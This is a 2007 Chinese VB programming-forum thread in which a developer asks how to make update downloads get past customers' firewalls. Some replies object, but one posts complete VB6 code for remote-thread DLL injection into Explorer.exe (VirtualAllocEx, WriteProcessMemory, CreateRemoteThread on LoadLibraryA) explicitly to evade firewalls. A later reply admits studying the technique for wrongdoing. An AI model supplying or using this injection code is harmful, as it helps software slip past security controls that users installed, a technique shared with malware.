小女子帮公司做项目的，第一次来此论坛，各位哥哥帮下忙吧，我写程序升级功能，客户一使用，就被防火墙屏蔽了，导致不能下载更新程序，请各位高手，帮下小妹了，今天问了下同事才知道，需要穿越防火墙下载的，可是不知道怎么做，查了很多资料一无所货，希望能给出代码，小妹在这里谢谢了！

我是不知道，这里肯定会有人知道，不过穿墙应该不难吧！

用插线程可以穿墙

将你下载的进程插入到Explorer进程中运行 就可以穿过大多数的防火墙


但是vb代码很难找哦

[此贴子已经被作者于2007-8-26 16:43:10编辑过]

你没事干研究穿墙干什么呢

谁叫你客户装防火墙的？防火墙非要拦截升级程序吗？

一般防火墙都会提示用户的吧

总之这个问题不是应用程序开发者需要考虑的


问清楚是什么防火墙 然后执行卸载程序

偶穿不过去~~~~~~

这个问题本来我们就不需要考虑……

要是大家都会穿墙了还不如不要防火墙……

其实我觉得LS的观点有失偏颇！

如果大家会穿墙了，这只能促进防火墙技术的更新进一步加快。就像病毒与杀软的关系一样！！！毕竟穿墙技术不是一般菜鸟级的人可以学会的~~~~~

你把LZ要做的程序和病毒类比？

方法:
将升级下载的那段代码,用vc做成Dll文件


然后 在模块中加入
Option Explicit

Public Const PROCESS_VM_READ = &H10
Public Const TH32CS_SNAPPROCESS = &H2
Public Const MEM_COMMIT = 4096
Public Const PAGE_READWRITE = 4
Public Const PROCESS_CREATE_THREAD = (&H2)
Public Const PROCESS_VM_OPERATION = (&H8)
Public Const PROCESS_VM_WRITE = (&H20)

'Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
'Public Declare Function GetLastError Lib "kernel32" () As Long
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSapshot As Long, lppe As PROCESSENTRY32) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Type PROCESSENTRY32
dwSize As Long
cntUseage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
swFlags As Long
szExeFile As String * 1024
End Type

Public Sub EnumAndInject()

Dim MySnapHandle As Long
Dim ProcessInfo As PROCESSENTRY32
Dim MyRemoteProcessId As Long
Dim MyDllFileLength As Long
Dim MyDllFileBuffer As Long
Dim MyReturn As Long
Dim MyStartAddr As Long
Dim MyResult As Long
Dim temp As Long
Dim DllFileName As String

MySnapHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
ProcessInfo.dwSize = Len(ProcessInfo)

If Process32First(MySnapHandle, ProcessInfo) <> 0 Then
Do
If InStr(ProcessInfo.szExeFile, "Explorer.exe") > 0 Then
'遍历进程,查找Explorer.exe
MyRemoteProcessId = OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_VM_READ, _
False, ProcessInfo.th32ProcessID)
'打开进程获得Explorer的句柄供后面的操作使用
DllFileName = "你的dll全路径名"
MyDllFileLength = Len(DllFileName) + 1

MyDllFileBuffer = VirtualAllocEx(MyRemoteProcessId, 0, MyDllFileLength, MEM_COMMIT, PAGE_READWRITE)
'在指定进程里申请一块内存区域出来供我们存放字符串“你的dll全路径名“

MyReturn = WriteProcessMemory(MyRemoteProcessId, MyDllFileBuffer, DllFileName, MyDllFileLength, temp)
'向刚才申请的内存中写入dll文件路径字符串

MyStartAddr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
'获取loadlibrary函数的地址,这个函数可以载入指定的dll文件,那他的参数呢?
'就是我们刚才在Explorer.exe进程里写入的“你的dll全路径名“
'在这里GetProcAddress得到的VB程序里LoadLibraryA函数的入口地址和
'Explorer程序里的LoadLibraryA函数地址是一致的(映射的作用),所以不必担心.
'还有要注意函数大小写，api函数和vb不一样的。

MyResult = CreateRemoteThread(MyRemoteProcessId, 0, 0, MyStartAddr, MyDllFileBuffer, 0, temp)
'让LoadLibrary载入“你的dll“吧，现在CreateRemoteThread做的就是在Explorer进程中把控制权转到LoadLibraryA的入口
'然后把Explorer内存区域中的“你的dll全路径名“字符串当作参数传给LoadLibraryA。现在你的dll文件就在Explorer程序中运行了
'dll被注入Explorer.exe

End If

Loop While Process32Next(MySnapHandle, ProcessInfo) <> 0
End If

CloseHandle MySnapHandle

End Sub

在你的程序里调用EnumAndInject 就可以穿墙运行升级了, 试试吧 不行再论!! 此代码来自 西门吹雪

[此贴子已经被作者于2007-8-26 19:56:10编辑过]

感谢楼上和西门吹雪

我之前也花了不少时间研究线程注入呢……也算是想干坏事呢 呵呵